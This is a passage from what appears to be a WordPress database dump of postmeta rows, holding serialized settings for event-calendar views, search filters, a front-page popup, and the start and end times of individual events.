M\";s:18:\"end_date_type_list\";s:4:\"date\";s:23:\"maximum_date_range_list\";s:0:\"\";s:4:\"grid\";s:1:\"0\";s:18:\"end_date_type_grid\";s:4:\"date\";s:23:\"maximum_date_range_grid\";s:0:\"\";s:4:\"tile\";s:1:\"0\";s:6:\"yearly\";s:1:\"0\";s:20:\"date_format_yearly_1\";s:1:\"l\";s:20:\"date_format_yearly_2\";s:3:\"F j\";s:7:\"monthly\";s:1:\"1\";s:19:\"activate_first_date\";s:1:\"0\";s:20:\"activate_current_day\";s:1:\"1\";s:6:\"weekly\";s:1:\"1\";s:5:\"daily\";s:1:\"1\";s:13:\"display_price\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"include_local_time\";s:1:\"0\";s:14:\"booking_button\";s:1:\"0\";s:11:\"custom_data\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";s:16:\"wrapper_bg_color\";s:0:\"\";}s:11:\"yearly_view\";a:16:{s:5:\"style\";s:6:\"modern\";s:15:\"start_date_type\";s:18:\"start_current_year\";s:10:\"start_date\";s:0:\"\";s:19:\"modern_date_format1\";s:1:\"l\";s:19:\"modern_date_format2\";s:3:\"F j\";s:5:\"limit\";s:0:\"\";s:6:\"months\";a:12:{i:1;s:1:\"1\";i:2;s:1:\"1\";i:3;s:1:\"1\";i:4;s:1:\"1\";i:5;s:1:\"1\";i:6;s:1:\"1\";i:7;s:1:\"1\";i:8;s:1:\"1\";i:9;s:1:\"1\";i:10;s:1:\"1\";i:11;s:1:\"1\";i:12;s:1:\"1\";}s:18:\"include_local_time\";s:1:\"0\";s:20:\"next_previous_button\";s:1:\"1\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:14:\"booking_button\";s:1:\"0\";s:11:\"custom_data\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";s:16:\"wrapper_bg_color\";s:0:\"\";}s:12:\"monthly_view\";a:17:{s:5:\"style\";s:6:\"simple\";s:15:\"start_date_type\";s:19:\"start_current_month\";s:10:\"start_date\";s:0:\"\";s:5:\"limit\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:20:\"next_previous_button\";s:1:\"1\";s:13:\"display_label\";s:1:\"1\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:19:\"activate_first_date\";s:1:\"0\";s:20:\"activate_current_day\";s:1:\"1\";s:11:\"display_all\";s:1:\"0\";s:14:\"booking_button\";s:1:\"0\";s:11:\"custom_data\";s:1:\"0\";s:13:\"detailed_time\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";s:16:\"wrapper_bg_color\";s:0:\"\";}s:3:\"map\";a:5:{s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:5:\"limit\";s:3:\"200\";s:11:\"geolocation\";s:1:\"0\";s:17:\"geolocation_focus\";s:1:\"0\";}s:10:\"daily_view\";a:16:{s:5:\"style\";s:7:\"classic\";s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:5:\"limit\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:20:\"next_previous_button\";s:1:\"1\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"display_categories\";s:1:\"0\";s:17:\"display_organizer\";s:1:\"0\";s:14:\"booking_button\";s:1:\"0\";s:11:\"custom_data\";s:1:\"0\";s:13:\"detailed_time\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";s:16:\"wrapper_bg_color\";s:0:\"\";}s:11:\"weekly_view\";a:16:{s:5:\"style\";s:7:\"classic\";s:15:\"start_date_type\";s:18:\"start_current_week\";s:10:\"start_date\";s:0:\"\";s:5:\"limit\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"display_categories\";s:1:\"0\";s:17:\"display_organizer\";s:1:\"0\";s:20:\"next_previous_button\";s:1:\"1\";s:14:\"booking_button\";s:1:\"0\";s:11:\"custom_data\";s:1:\"0\";s:13:\"detailed_time\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";s:16:\"wrapper_bg_color\";s:0:\"\";}s:9:\"timetable\";a:18:{s:5:\"style\";s:6:\"modern\";s:15:\"start_date_type\";s:18:\"start_current_week\";s:10:\"start_date\";s:0:\"\";s:5:\"limit\";s:0:\"\";s:21:\"number_of_days_modern\";s:1:\"7\";s:14:\"number_of_days\";s:1:\"5\";s:10:\"week_start\";s:2:\"-1\";s:10:\"start_time\";s:1:\"1\";s:8:\"end_time\";s:2:\"13\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:20:\"next_previous_button\";s:1:\"1\";s:14:\"booking_button\";s:1:\"0\";s:11:\"custom_data\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";s:16:\"wrapper_bg_color\";s:0:\"\";}s:7:\"masonry\";a:22:{s:5:\"style\";s:7:\"classic\";s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:13:\"end_date_type\";s:4:\"date\";s:18:\"maximum_date_range\";s:0:\"\";s:12:\"date_format1\";s:1:\"j\";s:12:\"date_format2\";s:1:\"F\";s:5:\"limit\";s:0:\"\";s:9:\"filter_by\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"display_categories\";s:1:\"0\";s:17:\"display_organizer\";s:1:\"0\";s:10:\"fit_to_row\";s:1:\"0\";s:17:\"masonry_like_grid\";s:1:\"0\";s:16:\"load_more_button\";s:1:\"0\";s:14:\"booking_button\";s:1:\"0\";s:11:\"custom_data\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";s:16:\"wrapper_bg_color\";s:0:\"\";}s:5:\"cover\";a:12:{s:5:\"style\";s:7:\"classic\";s:18:\"date_format_clean1\";s:1:\"d\";s:18:\"date_format_clean2\";s:1:\"M\";s:18:\"date_format_clean3\";s:1:\"Y\";s:20:\"date_format_classic1\";s:3:\"F d\";s:20:\"date_format_classic2\";s:1:\"l\";s:19:\"date_format_modern1\";s:8:\"l, F d Y\";s:8:\"event_id\";s:6:\"266611\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:16:\"wrapper_bg_color\";s:0:\"\";}s:9:\"countdown\";a:12:{s:5:\"style\";s:6:\"style1\";s:19:\"date_format_style11\";s:5:\"j F Y\";s:19:\"date_format_style21\";s:5:\"j F Y\";s:19:\"date_format_style31\";s:1:\"j\";s:19:\"date_format_style32\";s:1:\"F\";s:19:\"date_format_style33\";s:1:\"Y\";s:8:\"event_id\";s:2:\"-1\";s:8:\"bg_color\";s:7:\"#437df9\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:16:\"wrapper_bg_color\";s:0:\"\";}s:14:\"available_spot\";a:9:{s:5:\"style\";s:7:\"classic\";s:19:\"fluent_date_format1\";s:3:\"F d\";s:12:\"date_format1\";s:1:\"j\";s:12:\"date_format2\";s:1:\"F\";s:8:\"event_id\";s:2:\"-1\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:16:\"wrapper_bg_color\";s:0:\"\";}s:8:\"carousel\";a:26:{s:5:\"style\";s:5:\"type1\";s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:18:\"type1_date_format1\";s:1:\"d\";s:18:\"type1_date_format2\";s:1:\"F\";s:18:\"type1_date_format3\";s:1:\"Y\";s:18:\"type2_date_format1\";s:6:\"M d, Y\";s:18:\"type3_date_format1\";s:6:\"M d, Y\";s:5:\"count\";s:1:\"2\";s:5:\"limit\";s:0:\"\";s:15:\"autoplay_status\";s:1:\"1\";s:8:\"autoplay\";s:0:\"\";s:11:\"loop_status\";s:1:\"1\";s:14:\"booking_button\";s:1:\"0\";s:11:\"custom_data\";s:1:\"0\";s:12:\"archive_link\";s:0:\"\";s:9:\"head_text\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:20:\"include_events_times\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";s:10:\"navigation\";s:1:\"0\";s:15:\"dots_navigation\";s:1:\"0\";s:16:\"wrapper_bg_color\";s:0:\"\";}s:6:\"slider\";a:28:{s:5:\"style\";s:2:\"t1\";s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:18:\"type1_date_format1\";s:1:\"d\";s:18:\"type1_date_format2\";s:1:\"F\";s:18:\"type1_date_format3\";s:1:\"l\";s:18:\"type2_date_format1\";s:1:\"d\";s:18:\"type2_date_format2\";s:1:\"F\";s:18:\"type2_date_format3\";s:1:\"l\";s:18:\"type3_date_format1\";s:1:\"d\";s:18:\"type3_date_format2\";s:1:\"F\";s:18:\"type3_date_format3\";s:1:\"l\";s:18:\"type4_date_format1\";s:1:\"d\";s:18:\"type4_date_format2\";s:1:\"F\";s:18:\"type4_date_format3\";s:1:\"l\";s:18:\"type5_date_format1\";s:1:\"d\";s:18:\"type5_date_format2\";s:1:\"F\";s:18:\"type5_date_format3\";s:1:\"l\";s:5:\"limit\";s:0:\"\";s:8:\"autoplay\";s:0:\"\";s:15:\"transition_time\";s:3:\"250\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:11:\"custom_data\";s:1:\"0\";s:13:\"display_price\";s:1:\"0\";s:25:\"display_available_tickets\";s:1:\"0\";s:16:\"wrapper_bg_color\";s:0:\"\";}s:8:\"timeline\";a:17:{s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:13:\"end_date_type\";s:4:\"date\";s:18:\"maximum_date_range\";s:0:\"\";s:20:\"classic_date_format1\";s:5:\"d F Y\";s:5:\"limit\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"display_categories\";s:1:\"0\";s:17:\"display_organizer\";s:1:\"0\";s:16:\"load_more_button\";s:1:\"1\";s:13:\"month_divider\";s:1:\"0\";s:14:\"booking_button\";s:1:\"0\";s:11:\"custom_data\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";}s:4:\"tile\";a:17:{s:5:\"style\";s:7:\"classic\";s:15:\"start_date_type\";s:19:\"start_current_month\";s:10:\"start_date\";s:0:\"\";s:18:\"clean_date_format1\";s:1:\"j\";s:18:\"clean_date_format2\";s:1:\"M\";s:5:\"count\";s:1:\"4\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"display_categories\";s:1:\"0\";s:17:\"display_organizer\";s:1:\"0\";s:20:\"next_previous_button\";s:1:\"1\";s:5:\"limit\";s:0:\"\";s:16:\"load_more_button\";s:1:\"1\";s:14:\"booking_button\";s:1:\"0\";s:11:\"custom_data\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";}s:16:\"general_calendar\";a:8:{s:15:\"start_date_type\";s:19:\"start_current_month\";s:10:\"start_date\";s:0:\"\";s:10:\"more_event\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";}s:14:\"thumbnail_size\";a:2:{s:5:\"width\";s:0:\"\";s:6:\"height\";s:0:\"\";}}'),(136362,264262,'sf-options','a:12:{s:4:\"list\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:4:\"grid\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:6:\"agenda\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:13:\"full_calendar\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:12:\"monthly_view\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:11:\"yearly_view\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:3:\"map\";a:10:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:10:\"daily_view\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:11:\"weekly_view\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:9:\"timetable\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:4:\"tile\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:16:\"general_calendar\";a:10:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}}'),(136363,264262,'sf_status','0'),(136364,264262,'sf_display_label','0'),(136365,264262,'show_past_events','0'),(136366,264262,'show_only_past_events','0'),(136367,264262,'show_only_ongoing_events','0'),(136520,151053,'sgpb_popup_events_custom','a:1:{i:264285;a:1:{i:0;s:5:\"click\";}}'),(136488,264283,'popup_settings','a:39:{s:8:\"triggers\";a:1:{i:0;a:2:{s:4:\"type\";s:9:\"auto_open\";s:8:\"settings\";a:2:{s:11:\"cookie_name\";s:10:\"pum-264283\";s:5:\"delay\";i:500;}}}s:7:\"cookies\";a:1:{i:0;a:2:{s:5:\"event\";s:14:\"on_popup_close\";s:8:\"settings\";a:5:{s:4:\"name\";s:10:\"pum-264283\";s:3:\"key\";s:0:\"\";s:7:\"session\";b:0;s:4:\"time\";s:7:\"1 month\";s:4:\"path\";s:1:\"1\";}}}s:10:\"conditions\";a:1:{i:0;a:1:{i:0;a:1:{s:6:\"target\";s:13:\"is_front_page\";}}}s:8:\"theme_id\";s:4:\"2085\";s:4:\"size\";s:6:\"medium\";s:20:\"responsive_min_width\";s:2:\"0%\";s:20:\"responsive_max_width\";s:4:\"100%\";s:12:\"custom_width\";s:5:\"640px\";s:13:\"custom_height\";s:5:\"380px\";s:14:\"animation_type\";s:4:\"fade\";s:15:\"animation_speed\";s:3:\"350\";s:16:\"animation_origin\";s:10:\"center top\";s:10:\"open_sound\";s:4:\"none\";s:12:\"custom_sound\";s:0:\"\";s:8:\"location\";s:6:\"center\";s:12:\"position_top\";s:3:\"100\";s:15:\"position_bottom\";s:1:\"0\";s:13:\"position_left\";s:1:\"0\";s:14:\"position_right\";s:1:\"0\";s:6:\"zindex\";s:10:\"1999999999\";s:10:\"close_text\";s:0:\"\";s:18:\"close_button_delay\";s:1:\"0\";s:30:\"close_on_form_submission_delay\";s:1:\"0\";s:17:\"disable_on_mobile\";b:0;s:17:\"disable_on_tablet\";b:0;s:18:\"custom_height_auto\";b:0;s:18:\"scrollable_content\";b:0;s:21:\"position_from_trigger\";b:0;s:14:\"position_fixed\";b:0;s:16:\"overlay_disabled\";b:0;s:9:\"stackable\";b:0;s:18:\"disable_reposition\";b:0;s:24:\"close_on_form_submission\";b:0;s:22:\"close_on_overlay_click\";b:0;s:18:\"close_on_esc_press\";b:0;s:17:\"close_on_f4_press\";b:0;s:19:\"disable_form_reopen\";b:0;s:21:\"disable_accessibility\";b:0;s:10:\"theme_slug\";s:13:\"default-theme\";}'),(140307,264797,'protect_children',''),(140308,264797,'protect_children',''),(140309,264797,'protect_children',''),(140310,264797,'protect_children',''),(140311,264797,'protect_children',''),(140312,264797,'protect_children',''),(140313,264797,'protect_children',''),(140314,264797,'protect_children',''),(140315,264797,'protect_children',''),(140316,264797,'protect_children',''),(140317,264797,'_tribe_modified_fields','a:35:{s:16:\"protect_children\";i:1619714965;s:12:\"_EventOrigin\";i:1619714965;s:13:\"_thumbnail_id\";i:1619716231;s:24:\"boldgrid_hide_page_title\";i:1619714965;s:17:\"_EventShowMapLink\";i:1619714965;s:13:\"_EventShowMap\";i:1619714965;s:15:\"_EventStartDate\";i:1619716231;s:13:\"_EventEndDate\";i:1619716231;s:18:\"_EventStartDateUTC\";i:1619716231;s:16:\"_EventEndDateUTC\";i:1619716232;s:14:\"_EventDuration\";i:1619714965;s:20:\"_EventCurrencySymbol\";i:1619714965;s:22:\"_EventCurrencyPosition\";i:1619714965;s:10:\"_EventCost\";i:1619714965;s:9:\"_EventURL\";i:1619714965;s:14:\"_EventTimezone\";i:1619714965;s:18:\"_EventTimezoneAbbr\";i:1619714965;s:27:\"_EventNextPendingRecurrence\";i:1619714965;s:26:\"_RTECregistrationsDisabled\";i:1619714965;s:17:\"_RTECdeadlineType\";i:1619714965;s:19:\"_RTECwhoCanRegister\";i:1619714965;s:23:\"_RTEClimitRegistrations\";i:1619714965;s:21:\"_RTECmaxRegistrations\";i:1619714965;s:16:\"_EventRecurrence\";i:1619714965;s:18:\"_RTECnumRegistered\";i:1619714965;s:13:\"_EventVenueID\";i:1619714965;s:12:\"_dp_original\";i:1619714965;s:16:\"tribe_events_cat\";i:1619922109;s:10:\"_edit_last\";i:1619715086;s:10:\"post_title\";i:1619900270;s:12:\"post_content\";i:1619900509;s:11:\"post_status\";i:1619716231;s:35:\"passster_activate_global_protection\";i:1619900270;s:28:\"passster_activate_protection\";i:1619900270;s:24:\"passster_protection_type\";i:1619900270;}'),(140349,264797,'_EventDuration','3600'),(140318,264797,'_tribe_modified_fields','a:35:{s:16:\"protect_children\";i:1619714965;s:12:\"_EventOrigin\";i:1619714965;s:13:\"_thumbnail_id\";i:1619716231;s:24:\"boldgrid_hide_page_title\";i:1619714965;s:17:\"_EventShowMapLink\";i:1619714965;s:13:\"_EventShowMap\";i:1619714965;s:15:\"_EventStartDate\";i:1619716231;s:13:\"_EventEndDate\";i:1619716231;s:18:\"_EventStartDateUTC\";i:1619716231;s:16:\"_EventEndDateUTC\";i:1619716232;s:14:\"_EventDuration\";i:1619714965;s:20:\"_EventCurrencySymbol\";i:1619714965;s:22:\"_EventCurrencyPosition\";i:1619714965;s:10:\"_EventCost\";i:1619714965;s:9:\"_EventURL\";i:1619714965;s:14:\"_EventTimezone\";i:1619714965;s:18:\"_EventTimezoneAbbr\";i:1619714965;s:27:\"_EventNextPendingRecurrence\";i:1619714965;s:26:\"_RTECregistrationsDisabled\";i:1619714965;s:17:\"_RTECdeadlineType\";i:1619714965;s:19:\"_RTECwhoCanRegister\";i:1619714965;s:23:\"_RTEClimitRegistrations\";i:1619714965;s:21:\"_RTECmaxRegistrations\";i:1619714965;s:16:\"_EventRecurrence\";i:1619714965;s:18:\"_RTECnumRegistered\";i:1619714965;s:13:\"_EventVenueID\";i:1619714965;s:12:\"_dp_original\";i:1619714965;s:16:\"tribe_events_cat\";i:1619922109;s:10:\"_edit_last\";i:1619715086;s:10:\"post_title\";i:1619900270;s:12:\"post_content\";i:1619900509;s:11:\"post_status\";i:1619716231;s:35:\"passster_activate_global_protection\";i:1619900270;s:28:\"passster_activate_protection\";i:1619900270;s:24:\"passster_protection_type\";i:1619900270;}'),(183748,268531,'mec_hide_time','0'),(183749,268531,'mec_hide_end_time','0'),(183750,268531,'mec_comment',''),(183751,268531,'mec_timezone','global'),(144273,265224,'_field_402','Lexi'),(137109,260654,'_edit_lock','1617849449:2'),(183752,268531,'mec_countdown_method','global'),(183753,268531,'mec_public','1'),(183754,268531,'mec_start_date','2023-06-03'),(183755,268531,'mec_start_time_hour','10'),(183756,268531,'mec_start_time_minutes','30'),(183757,268531,'mec_start_time_ampm','AM'),(183758,268531,'mec_start_day_seconds','37800'),(183759,268531,'mec_end_date','2023-06-03'),(183760,268531,'mec_end_time_hour','11'),(183761,268531,'mec_end_time_minutes','30'),(183762,268531,'mec_end_time_ampm','AM'),(183763,268531,'mec_end_day_seconds','41400'),(183764,268531,'mec_repeat_status','0'),(183765,268531,'mec_repeat_type',''),(183766,268531,'mec_repeat_interval','1'),(183767,268531,'mec_repeat_end',''),(183768,268531,'